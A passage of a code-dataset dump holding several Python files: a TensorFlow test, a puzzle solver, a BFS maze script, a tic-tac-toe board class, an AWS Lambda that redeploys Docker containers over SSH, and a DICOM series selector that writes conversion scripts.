Make sure that we successfully get the number of elements.\n tensor = tf.convert_to_tensor([[1, 2, 3], [4, 5, 6]])\n self.assertEqual(6, helpers.get_num_elements_of_tensor(tensor))\n\n\nclass UniqueListTest(tf.test.TestCase):\n \"\"\"Tests for `UniqueList` classes.\"\"\"\n\n def test_construct(self):\n \"\"\"Tests the `UniqueList` constructor.\"\"\"\n element1 = 1\n element2 = 2\n element3 = element1\n element4 = 4\n element5 = element4\n element6 = 6\n\n unique_list = helpers.UniqueList(\n [element1, element2, element3, element4, element5, element6])\n self.assertEqual(4, len(unique_list))\n self.assertEqual([element1, element2, element4, element6], unique_list.list)\n\n def test_append_raises(self):\n \"\"\"Tests that \"append\" raises when given the wrong type.\"\"\"\n unique_list = helpers.UniqueList(element_type=list)\n self.assertEqual(0, len(unique_list))\n self.assertEqual([], unique_list.list)\n\n with self.assertRaises(TypeError):\n # Since we passed element_type=list to the UniqueList constructor,\n # attempting to 
add any non-list should raise.\n unique_list.append(42)\n\n def test_add(self):\n \"\"\"Tests `UniqueList`'s \"__add__\" method.\"\"\"\n element1 = 1\n element2 = 2\n element3 = element1\n element4 = 4\n element5 = element4\n element6 = 6\n\n lhs = [element1, element2]\n rhs = [element3, element4, element5, element6]\n\n unique_list = helpers.UniqueList(lhs)\n self.assertEqual(2, len(unique_list))\n self.assertEqual([element1, element2], unique_list.list)\n\n unique_list += rhs\n self.assertEqual(4, len(unique_list))\n self.assertEqual([element1, element2, element4, element6], unique_list.list)\n\n def test_radd(self):\n \"\"\"Tests `UniqueList`'s \"__radd__\" method.\"\"\"\n element1 = 1\n element2 = 2\n element3 = element1\n element4 = 4\n element5 = element4\n element6 = 6\n\n lhs = [element1, element2]\n rhs = [element3, element4, element5, element6]\n\n unique_list = helpers.UniqueList(rhs)\n self.assertEqual(3, len(unique_list))\n self.assertEqual([element1, element4, element6], unique_list.list)\n\n unique_list = lhs + unique_list\n self.assertEqual(4, len(unique_list))\n self.assertEqual([element1, element2, element4, element6], unique_list.list)\n\n\nif __name__ == \"__main__\":\n tf.test.main()\n","repo_name":"google-research/tensorflow_constrained_optimization","sub_path":"tensorflow_constrained_optimization/python/rates/helpers_test.py","file_name":"helpers_test.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"77"} +{"seq_id":"21037494044","text":"from itertools import permutations\nfrom sys import stdin\nN = int(stdin.readline())\nnum = list(map(int, stdin.readline().split()))\noperator = list(map(int,stdin.readline().split()))\nops = ['+','-','*','/']\n\nop = []\nfor i in range(4) :\n if(operator[i] != 0) :\n op.extend([ops[i]]*operator[i])\n\n_min = 1000000001\n_max = -1000000001\nfor perm in permutations(op, N-1) :\n n = num[0]\n for i in range(N-1) : \n if(perm[i] == '+') : \n n = n + num[i+1]\n if(perm[i] == '-') : \n n = n - num[i+1]\n if(perm[i] == '*') : \n n = n * num[i+1]\n if(perm[i] == '/') : \n if(n < 0) :\n n = ((n*-1) // num[i+1])*-1\n else :\n n = n // num[i+1]\n _min = min(_min, n) \n _max = max(_max, n)\n\nprint(_max)\nprint(_min)\n\n \n\n\n","repo_name":"chaeeon-lim/ProgrammingLearners","sub_path":"hyobin/Intermediate_Algorithm/bruteforce_permutation/Operator_1339.py","file_name":"Operator_1339.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17296825712","text":"# This file contains the AWS Lambda function that programmatically redeploys docker containers on the EC2 instances serving\n# the Flask and React apps. The Lambda function is triggered when the docker images for the aforementioned containers\n# build successfully on DockerHub.\n\n# How I created the Lambda deployment package (ZIP File):\n# To use paramiko in AWS Lambda, Lambda must be provided with a ZIP file containing all the needed dependencies.\n# This ZIP file was created by zipping the site-packages folder of a python virtual environment (which\n# contains paramiko and its dependencies). To prevent any binary incompatibility issues arising from differing machine\n# architectures, this virtual environment was created on an EC2 instance that uses the same execution environment\n# as AWS Lambda. 
The AMI name for this execution environment is 'amzn-ami-hvm-2017.03.1.20170812-x86_64-gp2'\n\nimport boto3\nimport paramiko\nimport os\nimport json\nfrom base64 import b64decode\n\nENCRYPTED_REACT_HOST = os.environ['ec2_react_host']\nDECRYPTED_REACT_HOST = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED_REACT_HOST))['Plaintext']\n\nENCRYPTED_FLASK_HOST = os.environ['ec2_flask_host']\nDECRYPTED_FLASK_HOST = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED_FLASK_HOST))['Plaintext']\n\ndef lambda_handler(event, context):\n\n    # Download private key file from secure S3 bucket\n    s3_client = boto3.client('s3')\n    s3_client.download_file('odc-gear','odc.pem', '/tmp/odc.pem')\n    k = paramiko.RSAKey.from_private_key_file(\"/tmp/odc.pem\")\n\n    ###########################################################\n\n    # SSH into EC2 instance serving the React application and stop, remove, update, and rerun docker container.\n    client = paramiko.SSHClient()\n    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n    client.connect(hostname=DECRYPTED_REACT_HOST, username=\"ubuntu\", pkey=k)\n    commands = [\n        # React front-end deployment\n        'sudo docker stop react-front-end',\n        'sudo docker rm react-front-end',\n        'sudo docker rmi zakinator123/gear-tracker-frontend:latest',\n        'sudo docker pull zakinator123/gear-tracker-frontend',\n        'sudo docker run -d --name react-front-end -p 8080:80 zakinator123/gear-tracker-frontend',\n        'sudo service haproxy restart',\n    ]\n\n    # Execute the commands on the instance\n    for command in commands:\n        stdin, stdout, stderr = client.exec_command(command)\n        print(stdout.read())\n        print(stderr.read())\n    client.close()\n\n    ###########################################################\n\n    # SSH into EC2 instance serving the Flask application and stop, remove, update, and rerun docker container.\n    client = paramiko.SSHClient()\n    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n    client.connect(hostname=DECRYPTED_FLASK_HOST, username=\"ubuntu\", pkey=k)\n    commands = [\n        # Flask back-end deployment\n        \"sudo docker stop odc\",\n        \"sudo docker rm odc\",\n        \"sudo docker rmi zakinator123/gear-tracker-backend:latest\",\n        'sudo docker pull zakinator123/gear-tracker-backend',\n        'sudo docker pull zakinator123/gear-tracker-flyway',\n        'sudo docker run --name flyway --link mysql --env-file ~/flyway_env_vars zakinator123/gear-tracker-flyway -connectRetries=60 migrate',\n        'sudo docker rm gear-tracker-flyway',\n        \"sudo docker run -d --name odc --link mysql -p 8080:80 --env-file ./env_vars zakinator123/gear-tracker-backend\",\n        \"sudo service haproxy restart\",\n    ]\n\n    # Execute the commands on the instance\n    for command in commands:\n        stdin, stdout, stderr = client.exec_command(command)\n        print(stdout.read())\n        print(stderr.read())\n    client.close()\n\n    ###########################################################\n\n    message = {\n        \"statusCode\": 200,\n        \"headers\": {\"Content-Type\": \"application/json\"},\n        \"body\": json.dumps({\"message\": \"Success!\"}),\n        \"isBase64Encoded\": False\n    }\n\n    return message","repo_name":"Zakinator123/Gear-Tracker","sub_path":"miscellaneous/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":4114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6727153975","text":"from collections import deque\nn,m = map(int,input().split())\ngraph = [list(map(int,input())) for _ in range(n)]\n\n# directions: up, down, left, right\ndx = [-1,1,0,0]\ndy = [0,0,-1,1]\n
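\n# Example stdin this script assumes (an n x m grid of 0/1 digits where 1 is walkable;\n# the format is inferred from the reads above, matching a typical shortest-path maze problem):\n# 4 6\n# 101111\n# 101010\n# 101011\n# 111011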
\n\ndef bfs(x,y):\n    queue = deque()\n    queue.append((x,y))\n    graph[x][y]=0\n    while(queue):\n        x,y = queue.popleft()\n        for i in range(4):\n            nx = x + dx[i]\n            ny = y + dy[i]\n            if nx<0 or ny<0 or nx>n-1 or ny>m-1 or graph[nx][ny]==0:\n                continue\n            if graph[nx][ny] == 1: # visited cells already hold their distance, so the cell value itself is the shortest distance\n                graph[nx][ny] = graph[x][y]+1\n                queue.append((nx,ny))\n    \n    return graph[n-1][m-1] \n\nprint(bfs(0,0)+1)\n \n \n","repo_name":"leehanjun506/Algorithm","sub_path":"PSwithNaDongBin/DFS,BFS/prac_2.py","file_name":"prac_2.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20083447823","text":"import numpy as np\r\n\r\n\r\nclass Board:\r\n\r\n    P1 = -1\r\n    P2 = -2\r\n    DRAW = -3\r\n    NO_WIN = 0\r\n\r\n    MOVE_SUCCESS = 0\r\n    MOVE_INVALID = 1\r\n    \r\n    def __init__(self, shape):\r\n        \"\"\" Initialise board of a specified size. \"\"\"\r\n\r\n        self.board_shape = shape # Easier to store instead of calling self.board.shape[0]\r\n        \r\n        res = []\r\n        for i in range(shape):\r\n            res.append(np.arange(shape*i, shape*(i+1)))\r\n\r\n        self.board = np.array(res)\r\n        self.board += 1\r\n\r\n        self.num_moves = 0\r\n    \r\n    \r\n    def make_copy(self):\r\n        \"\"\" Return a copy of a board instance. Used for minimax.\"\"\"\r\n\r\n        new_board = Board(self.board_shape)\r\n        new_board.board = np.copy(self.board)\r\n        new_board.num_moves = self.num_moves\r\n        return new_board\r\n\r\n\r\n    def print_board(self):\r\n        \"\"\" Pretty printing for the board object instance. \"\"\"\r\n\r\n        def to_symbol(symbol):\r\n            if symbol == Board.P1: return 'X'\r\n            elif symbol == Board.P2: return 'O'\r\n            else: return symbol\r\n\r\n        for index, row in enumerate(self.board): \r\n            print(\" | |\")\r\n            print(\" \" + str(to_symbol(row[0])) + \" | \" + str(to_symbol(row[1])) + \" | \" \r\n                  + str(to_symbol(row[2])) )\r\n            print(\" | |\")\r\n\r\n            if index == self.board_shape - 1:\r\n                break\r\n\r\n            print(\"----------------\")\r\n\r\n    def get_empty_squares(self):\r\n        \"\"\" Return a list of the empty squares on this board.\"\"\"\r\n        empty_squares = []\r\n        for position in self.board.flat:\r\n            if position != Board.P1 and position != Board.P2:\r\n                empty_squares.append(position)\r\n\r\n        return empty_squares\r\n\r\n\r\n\r\n\r\n    def make_move(self, position, symbol):\r\n        \"\"\" \r\n        Attempt to make a move on the board object given a position number and a symbol to go there.\r\n        :param int position: numbers 1 to 9\r\n        Returns:\r\n            MOVE_SUCCESS if valid move.\r\n            MOVE_INVALID if invalid move.\r\n        \"\"\"\r\n        # Flatten board so we can just directly use position number.\r\n        self.board = self.board.flatten()\r\n\r\n        # Check that position is empty so we can actually place something \r\n        if self.board[position - 1] == position:\r\n            self.board[position - 1] = symbol\r\n            self.board = self.board.reshape(self.board_shape, self.board_shape)\r\n            self.num_moves += 1 \r\n            return Board.MOVE_SUCCESS\r\n        \r\n        else:\r\n            # Invalid move: position not free.\r\n            self.board = self.board.reshape(self.board_shape, self.board_shape) \r\n            return Board.MOVE_INVALID \r\n\r\n\r\n\r\n\r\n    \r\n    def check_for_win(self):\r\n        \"\"\"\r\n        Check board for winning position.\r\n        \r\n        Returns:\r\n            Board.P1 if player 1 (X) has won\r\n            Board.P2 if player 2 (O) has won \r\n            Board.DRAW if draw\r\n            Board.NO_WIN if inconclusive\r\n\r\n        \"\"\"\r\n\r\n        # Check each row for a win\r\n        for row in self.board:\r\n            if np.all(row == Board.P1): return Board.P1\r\n            if np.all(row == Board.P2): return Board.P2 \r\n\r\n        # Check columns\r\n        for 
row in self.board.T:\r\n if np.all(row == Board.P1): return Board.P1\r\n if np.all(row == Board.P2): return Board.P2\r\n\r\n # Check diagonals\r\n diag1 = np.diagonal(self.board)\r\n diag2 = np.diagonal(np.fliplr(self.board))\r\n\r\n if np.all(diag1 == Board.P1): return Board.P1\r\n if np.all(diag1 == Board.P2): return Board.P2 \r\n if np.all(diag2 == Board.P1): return Board.P1\r\n if np.all(diag2 == Board.P2): return Board.P2 \r\n\r\n if self.num_moves == (self.board_shape * self.board_shape):\r\n return Board.DRAW\r\n\r\n return Board.NO_WIN \r\n","repo_name":"mwall-dev/ticTacToeAI","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"42696370677","text":"script_version = 1.0\n\n# Imports\nimport argparse\nimport os\nimport sys\nimport vtk\nimport SimpleITK as sitk\nfrom datetime import date\nfrom ogo.util.echo_arguments import echo_arguments\nimport ogo.util.Helper as ogo\nimport queue\nimport re\nimport collections\nimport pandas as pd\nimport datetime\n\n# +------------------------------------------------------------------------------+\n# Writer\ndef write(entry, deliminator, ofile):\n if ofile is None:\n output = os.sys.stdout\n else:\n if os.path.isfile(ofile):\n output = open(ofile, 'a')\n else:\n output = open(ofile, 'w')\n output.write(deliminator.join([str(x) for x in write.header]))\n output.write(os.linesep)\n\n output.write(deliminator.join([str(x) for x in entry]))\n output.write(os.linesep)\n\n if output is not os.sys.stdout:\n output.close()\n\n# +------------------------------------------------------------------------------+\n# Various selection criteria for sorting to find the best image series\ndef try_by_modality(df):\n keywords = ['CT']\n \n for keyword in keywords:\n tmp_reduced_df = df.loc[(df['Modality'].str.contains(keyword, na=False))]\n \n if tmp_reduced_df.shape[0] > 0:\n return tmp_reduced_df, keyword, tmp_reduced_df.shape[0]\n \n tmp_reduced_df = df\n return tmp_reduced_df, 'NOT FOUND', tmp_reduced_df.shape[0]\n\ndef try_by_image_type(df):\n keywords = ['PRIMARY'] # If we can't get PRIMARY...\n \n for keyword in keywords:\n tmp_reduced_df = df.loc[(df['ImageType'].str.contains(keyword, na=False))]\n \n if tmp_reduced_df.shape[0] > 0:\n return tmp_reduced_df, keyword, tmp_reduced_df.shape[0]\n \n tmp_reduced_df = df\n return tmp_reduced_df, 'NOT FOUND', tmp_reduced_df.shape[0]\n\ndef try_by_study_description(df):\n keywords = ['ABD','PELVIS','BODY','CHEST'] # If we can't get ABDOMEN, then get PELVIS, then BODY, etc\n \n for keyword in keywords:\n tmp_reduced_df = df.loc[(df['StudyDescription'].str.contains(keyword, na=False))]\n \n if tmp_reduced_df.shape[0] > 0:\n return tmp_reduced_df, keyword, tmp_reduced_df.shape[0]\n \n tmp_reduced_df = df\n return tmp_reduced_df, 'NOT FOUND', tmp_reduced_df.shape[0]\n \ndef try_by_series_description(df):\n keywords = ['ABD','PEL','CHEST','Chest','AP','WB','Lung','LUNG','BODY','Body'] # If we can't get ABDOMEN, then get PELVIS, then CHEST, etc.\n \n for keyword in keywords:\n tmp_reduced_df = df.loc[(df['SeriesDescription'].str.contains(keyword, na=False))]\n \n if tmp_reduced_df.shape[0] > 0:\n return tmp_reduced_df, keyword, tmp_reduced_df.shape[0]\n \n tmp_reduced_df = df\n return tmp_reduced_df, 'NOT FOUND', tmp_reduced_df.shape[0]\n \ndef try_by_slice_thickness(df): # If we can't get 1.0mm, then get 2.0mm, etc.\n #slice_thicknesses = [1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 
9.0, 10.0]\n slice_thicknesses = [3.0]\n \n for slice_thickness in slice_thicknesses:\n tmp_reduced_df = df.loc[(df['SliceThickness'] <= slice_thickness)]\n \n if tmp_reduced_df.shape[0] > 0:\n return tmp_reduced_df, slice_thickness, tmp_reduced_df.shape[0]\n \n tmp_reduced_df = df\n return tmp_reduced_df, 'NOT FOUND', tmp_reduced_df.shape[0]\n\ndef try_by_series_number(df): # Only accept series \n acceptable_series_numbers = [50]\n \n for series_number in acceptable_series_numbers:\n tmp_reduced_df = df.loc[(df['SeriesNumber'] < series_number)]\n \n if tmp_reduced_df.shape[0] > 0:\n return tmp_reduced_df, series_number, tmp_reduced_df.shape[0]\n \n tmp_reduced_df = df\n return tmp_reduced_df, 'NOT FOUND', tmp_reduced_df.shape[0]\n\ndef try_by_number_of_images(df): # If we can't get 1000 slices, then get 900, etc.\n #images_in_series = [1000, 900, 800, 700, 600, 500, 400, 300, 250, 200, 150, 100, 50]\n images_in_series = [300, 200, 100]\n \n for n_images in images_in_series:\n tmp_reduced_df = df.loc[(df['NumberOfReferences'] >= n_images)]\n \n if tmp_reduced_df.shape[0] > 0:\n return tmp_reduced_df, n_images, tmp_reduced_df.shape[0]\n \n tmp_reduced_df = df\n return tmp_reduced_df, 'NOT FOUND', tmp_reduced_df.shape[0]\n\ndef try_by_pixel_spacing(df): # If we can't get 0.5mm, then get 0.6mm, etc.\n #pixel_spacings = ['0.5', '0.6', '0.7', '0.8', '0.9', '1.0', '1.5']\n pixel_spacings = ['1.0', '1.5']\n \n for pixel_spacing in pixel_spacings:\n tmp_reduced_df = df.loc[(df['PixelSpacing'].str.contains(pixel_spacing, na=False))]\n \n if tmp_reduced_df.shape[0] > 0:\n return tmp_reduced_df, pixel_spacing, tmp_reduced_df.shape[0]\n \n tmp_reduced_df = df\n return tmp_reduced_df, 'NOT FOUND', tmp_reduced_df.shape[0]\n\ndef exclude_by_series_description(df,keywords):\n \n for keyword in keywords:\n tmp_reduced_df = df.loc[(df['SeriesDescription'].str.contains(keyword, na=False, case=False) == False)]\n df = tmp_reduced_df\n \n return tmp_reduced_df, '('+','.join('{}'.format(k) for k in keywords)+')', tmp_reduced_df.shape[0] \n \ndef exclude_by_number_of_images(df,n_images):\n \n tmp_reduced_df = df.loc[(df['NumberOfReferences'] >= n_images)]\n \n return tmp_reduced_df, '(min={})'.format(n_images), tmp_reduced_df.shape[0]\n\ndef exclude_by_slice_thickness(df,slice_thickness):\n \n tmp_reduced_df = df.loc[(df['SliceThickness'] <= slice_thickness)]\n \n return tmp_reduced_df, '(Th={:.2f})'.format(slice_thickness), tmp_reduced_df.shape[0]\n\n# +------------------------------------------------------------------------------+\n# Sort scans\ndef DicomSelector(csvfile,output,minNumberSlices,maxSliceThickness,overwrite):\n \n exclude_keywords = ['NECK','CTNKE','CTHDE','HEAD','LEGS'] # Add CHEST, LUNG, MPR, LIVER?\n \n # Check for valid input\n if os.path.splitext(csvfile)[1].lower() not in '.csv':\n ogo.message('[ERROR] Valid CSV file has not been provided. File provided:')\n ogo.message(' {}'.format(csvfile))\n os.sys.exit()\n \n # Check if output report exists and should overwrite\n if output:\n if os.path.isfile(output) and not overwrite:\n result = input('File \\\"{}\\\" already exists. Overwrite? [y/n]: '.format(output))\n if result.lower() not in ['y', 'yes']:\n ogo.message('Not overwriting. Exiting...')\n os.sys.exit()\n else:\n output = os.path.splitext(csvfile)[0] + '_selected.csv'\n if os.path.isfile(output) and not overwrite:\n result = input('File \\\"{}\\\" already exists. Overwrite? [y/n]: '.format(output))\n if result.lower() not in ['y', 'yes']:\n ogo.message('Not overwriting. 
Exiting...')\n os.sys.exit()\n output_pull = os.path.splitext(output)[0] + '.sh'\n\n ogo.message('Results will be output to {}'.format(output))\n\n ogo.message('Begin sorting...')\n \n debugging = False\n \n # Get all the names of exams into a sorted list\n csvData = pd.read_csv(csvfile)\n name_list = csvData['Name'].tolist()\n name_list = list(set(name_list))\n name_list.sort()\n \n # Sort data frame\n ogo.message('Put the data into order by Name, Date, Slices, Slice Thickness...')\n csvData.sort_values([\"Name\", \"AcquisitionDate\", \"NumberOfReferences\", \"SliceThickness\"], \n axis=0,\n ascending=[True, True, False, True], \n inplace=True)\n \n ogo.message('Dataframe size is {}.'.format(csvData.shape[0]))\n ogo.message('')\n\n sorted_df = pd.DataFrame([]) # Used to collect the selected series\n \n # Begin sorting one name at a time\n for idx, name in enumerate(name_list):\n \n name_csvData = csvData.loc[csvData['Name'].str.contains(name,case=False)]\n \n date_list = name_csvData['AcquisitionDate'].tolist()\n date_list = list(set(date_list))\n date_list = [x for x in date_list if str(x) != 'nan'] # cleans date list of nan values\n date_list.sort()\n \n for this_date in date_list:\n reduced_df = name_csvData.loc[(name_csvData['AcquisitionDate'] == this_date)]\n n_series = reduced_df.shape[0]\n ogo.message('{:22s} {:>10s} {:>10s}'.format(name,this_date,'N'))\n ogo.message(' {:20s} {:>10s} {:>10d}'.format('Start',' ',n_series))\n \n # Exclude based on Number of Images (slices)\n if n_series > 1:\n reduced_df, val, n_series = exclude_by_number_of_images(reduced_df,minNumberSlices)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('NumberOfImages',val,reduced_df.shape[0]))\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n # Exclude based on Slice Thickness\n if n_series > 1:\n reduced_df, val, n_series = exclude_by_slice_thickness(reduced_df,maxSliceThickness)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('SliceThickness',val,reduced_df.shape[0]))\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n # Exclude based on Series Description\n if n_series > 1:\n reduced_df, val, n_series = exclude_by_series_description(reduced_df,exclude_keywords)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('SeriesDescription',val,reduced_df.shape[0]))\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n ## Include by Modality\n #if n_series > 1:\n # reduced_df, val, n_series = try_by_modality(reduced_df)\n # ogo.message(' {:20s} {:>10s} {:>10d}'.format('Modality',val,reduced_df.shape[0]))\n #if debugging:\n # print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n # \n ## Include by Slice Thickness\n #if n_series > 1:\n # reduced_df, val, n_series = try_by_slice_thickness(reduced_df)\n # ogo.message(' {:20s} {:>10} {:>10d}'.format('SliceThickness',val,reduced_df.shape[0]))\n #if debugging:\n # print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n #\n ## Pixel Spacing\n #if n_series > 1:\n # reduced_df, val, n_series = try_by_pixel_spacing(reduced_df)\n # ogo.message(' {:20s} {:>10} {:>10d}'.format('PixelSpacing',val,reduced_df.shape[0]))\n #if debugging:\n # 
print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n ogo.message(' {:20s} {:>10s} {:>10d}'.format('Finish',' ',n_series))\n \n \n if False:\n # Study Description\n if n_series > 1:\n reduced_df, val, n_series = try_by_study_description(reduced_df)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('StudyDescription',val,reduced_df.shape[0]))\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n # Series Description\n if n_series > 1:\n reduced_df, val, n_series = try_by_series_description(reduced_df)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('SeriesDescription',val,reduced_df.shape[0]))\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n # Series Number\n if n_series > 1:\n reduced_df, val, n_series = try_by_series_number(reduced_df)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('SeriesNumber',val,reduced_df.shape[0]))\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n # Image Type\n if n_series > 1:\n reduced_df, val, n_series = try_by_image_type(reduced_df)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('ImageType',val,reduced_df.shape[0]))\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n # Number of Images\n if n_series > 1:\n reduced_df, val, n_series = try_by_number_of_images(reduced_df)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('NumberOfImages',val,reduced_df.shape[0]))\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n # Lowest Series Number\n if n_series > 1:\n reduced_df = reduced_df.head(1)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('First series',val,reduced_df.shape[0]))\n n_series = reduced_df.shape[0]\n ogo.message(' {:20s} {:>10} {:>10d} **'.format('MORE CRITERIA NEEDED',' ',n_series))\n #print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n ogo.message(' {:16} (Series Number = {:3d}) {:>6d}'.format('FINAL SELECTION',int(reduced_df.iloc[0]['Series Number']),reduced_df.shape[0]))\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n ogo.message('')\n\n # Collect the selected series\n sorted_df = pd.concat([sorted_df,reduced_df])\n \n # Final selection\n ogo.message('Dataframe size is reduced to {}.'.format(sorted_df.shape[0]))\n ogo.message('')\n \n # Write csv file\n ogo.message('Writing csv output file:')\n ogo.message(' {}'.format(output))\n sorted_df.to_csv(output)\n ogo.message('')\n\n # Write script to pull the dicom files\n ogo.message('Writing file for pulling dicom files:')\n ogo.message(' {}'.format(output_pull))\n ogo.message('')\n\n \n fpull = open(output_pull, 'w')\n sorted_df = sorted_df.reset_index() # make sure indexes pair with number of rows\n current_dir = os.getcwd()\n\n fpull.write('#!/bin/bash\\n')\n fpull.write('exit\\n')\n fpull.write('# \\n')\n fpull.write('# Generated by ogoDicomScanner: 
{}\\n'.format(datetime.datetime.now()))\n    fpull.write('# \\n')\n    fpull.write('# Script to pull a dicom series, create a NIfTI, and visualize with offscreen rendering.\\n')\n    fpull.write('# Prior to running, remove line 2 after checking the following:\\n')\n    fpull.write('# 1. Check BASE_DIR, OUTPUT_DICOM_DIR, OUTPUT_NIFTI_DIR for accuracy.\\n')\n    fpull.write('# 2. Check that conda is installed on the path described below.\\n')\n    fpull.write('# 3. Check that ogo is installed in your conda environment.\\n')\n    fpull.write('# 4. Remove line #2 once all checks are complete.\\n')\n    fpull.write(os.linesep)\n    fpull.write('BASE_DIR=\\'{}\\'\\n'.format(current_dir))\n    fpull.write('OUTPUT_DICOM_DIR=\\'{}\\'\\n'.format(current_dir+'/dicom'))\n    fpull.write('OUTPUT_NIFTI_DIR=\\'{}\\'\\n'.format(current_dir+'/nifti'))\n    fpull.write(os.linesep)\n    fpull.write('source /Users/skboyd/opt/miniconda3/etc/profile.d/conda.sh\\n')\n    fpull.write('conda activate ogo\\n')\n    fpull.write(os.linesep)\n\n    current_name = ''\n    for index, row in sorted_df.iterrows():\n        fname = '{}_{}_{}_{}'.format( \\\n            row['Name'], \\\n            str(row['AcquisitionDate']).replace('-',''), \\\n            str(row['SeriesDescription']).replace(',','_').replace(' ','_').replace('__','_'), \\\n            int(row['SeriesNumber']) \\\n            )\n        this_name = '{}_{}'.format( \\\n            row['Name'], \\\n            str(row['AcquisitionDate']).replace('-',''))\n        \n        dicompull_cmd = '#dicompull -k SeriesInstanceUID={} {}/\\'{}\\' -o {}\\'/{}\\'\\n'.format( \\\n            row['SeriesInstanceUID'], \\\n            '${BASE_DIR}', \\\n            os.path.split(row['ReferencedFileID'])[0], \\\n            '${OUTPUT_DICOM_DIR}', \\\n            fname \\\n            )\n        dicomtonifti_cmd = '#dicomtonifti -brz --fsl {}/\\'{}\\' -o {}\\'/{}_0000.nii.gz\\'\\n'.format( \\\n            '${OUTPUT_DICOM_DIR}', \\\n            fname, \\\n            '${OUTPUT_NIFTI_DIR}', \\\n            this_name \\\n            )\n        ogoVisualize_cmd = '#ogoVisualize vis2d --offscreen {}/\\'{}_0000.nii.gz\\' --outfile {}/\\'{}_0000_2d.tif\\'\\n'.format( \\\n            '${OUTPUT_NIFTI_DIR}', \\\n            this_name, \\\n            '${OUTPUT_NIFTI_DIR}', \\\n            this_name \\\n            )\n        \n        if this_name != current_name:\n            name_hdr = '# {} {:s}\\n'.format(this_name,'-'*80)\n            fpull.write(name_hdr)\n            fpull.write(os.linesep)\n            current_name = this_name\n        \n        fpull.write(dicompull_cmd)\n        fpull.write(dicomtonifti_cmd)\n        fpull.write(ogoVisualize_cmd)\n        fpull.write(os.linesep)\n    \n    fpull.write('exit\\n')\n    fpull.close()\n    \n    ogo.message('Done!')\n    \ndef main():\n    # Setup description\n    description = '''\nTakes a CSV file of meta data where each row represents a dicom series within\ndicom studies. The selection criteria are used to narrow the search for the \nbest series.\n\nCurrently it is set to only exclude series that are certain to be useless:\n – excludes based on having a minimum number of slices\n – excludes based on having a maximum slice thickness\n – excludes any series with certain keywords (hardcoded, not case sensitive)\n  \nIf you want to try different inclusion/exclusion criteria you should edit the\nsource code.\n\n'''\n\n    epilog = '''\nExample call: \n  \nogoDicomSelector list.csv ! 
